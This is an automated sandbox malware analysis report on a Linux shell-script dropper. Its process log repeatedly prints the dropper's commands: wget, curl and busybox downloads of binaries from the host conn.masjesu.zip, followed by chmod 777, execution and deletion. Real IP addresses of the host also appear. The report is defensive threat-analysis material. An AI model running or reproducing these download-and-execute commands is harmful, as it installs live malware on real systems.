Malware Analysis Report

2024-11-13 17:48

Sample ID 241110-bdke4awcpp
Target 2408085a258a318bc587e649a5e777ad.bin
SHA256 9b233ed6c31bc80fa0c4571afa427c1dce8edbe9ce5fe2c2cbc640926d5d64f6
Tags
defense_evasion discovery antivm
score
7/10


Analysis Overview

score
7/10

SHA256

9b233ed6c31bc80fa0c4571afa427c1dce8edbe9ce5fe2c2cbc640926d5d64f6

Threat Level: Shows suspicious behavior

The file 2408085a258a318bc587e649a5e777ad.bin was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-10 01:01

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-10 01:01

Reported

2024-11-10 01:04

Platform

debian9-mipsbe-20240611-en

Max time kernel

149s

Max time network

66s

Command Line

[/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO N/A
N/A /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J N/A
N/A /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv N/A
N/A /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 N/A
N/A /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt N/A
N/A /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV N/A
N/A /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B N/A
N/A /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc N/A
N/A /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR N/A
N/A /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 N/A
N/A /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y N/A
N/A /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF N/A
N/A /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl N/A
N/A /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug N/A
N/A /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt N/A
N/A /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV N/A
N/A /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B N/A
N/A /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc N/A
N/A /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR N/A
N/A /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /usr/bin/curl N/A
File opened for modification /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /usr/bin/curl N/A
File opened for modification /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /usr/bin/curl N/A
File opened for modification /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /usr/bin/curl N/A
File opened for modification /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /usr/bin/curl N/A
File opened for modification /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /usr/bin/curl N/A
File opened for modification /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /usr/bin/curl N/A
File opened for modification /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /usr/bin/curl N/A
File opened for modification /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF /usr/bin/curl N/A
File opened for modification /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl /usr/bin/curl N/A
File opened for modification /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /usr/bin/curl N/A
File opened for modification /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /usr/bin/curl N/A
File opened for modification /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /usr/bin/curl N/A
File opened for modification /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /usr/bin/curl N/A
File opened for modification /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /usr/bin/curl N/A
File opened for modification /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug /usr/bin/curl N/A
File opened for modification /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /usr/bin/curl N/A
File opened for modification /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /usr/bin/curl N/A
File opened for modification /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /usr/bin/curl N/A
File opened for modification /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /usr/bin/curl N/A

Processes

/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh

[/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/chmod

[chmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO

[./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/rm

[rm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/chmod

[chmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J

[./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/rm

[rm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/chmod

[chmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv

[./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/rm

[rm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/chmod

[chmod 777 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3

[./trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/rm

[rm trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/chmod

[chmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt

[./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/rm

[rm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/chmod

[chmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV

[./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/rm

[rm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/chmod

[chmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B

[./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/rm

[rm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/chmod

[chmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc

[./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/rm

[rm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/chmod

[chmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR

[./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/rm

[rm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/chmod

[chmod 777 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5

[./pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/rm

[rm pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/chmod

[chmod 777 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y

[./wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/rm

[rm wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/chmod

[chmod 777 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF

[./mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/rm

[rm mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/chmod

[chmod 777 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl

[./hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/rm

[rm hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/chmod

[chmod 777 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug

[./nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/rm

[rm nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/chmod

[chmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt

[./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/rm

[rm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/chmod

[chmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV

[./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/rm

[rm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/chmod

[chmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B

[./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/rm

[rm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/chmod

[chmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc

[./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/rm

[rm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/chmod

[chmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR

[./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/rm

[rm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/chmod

[chmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv

[./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/rm

[rm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
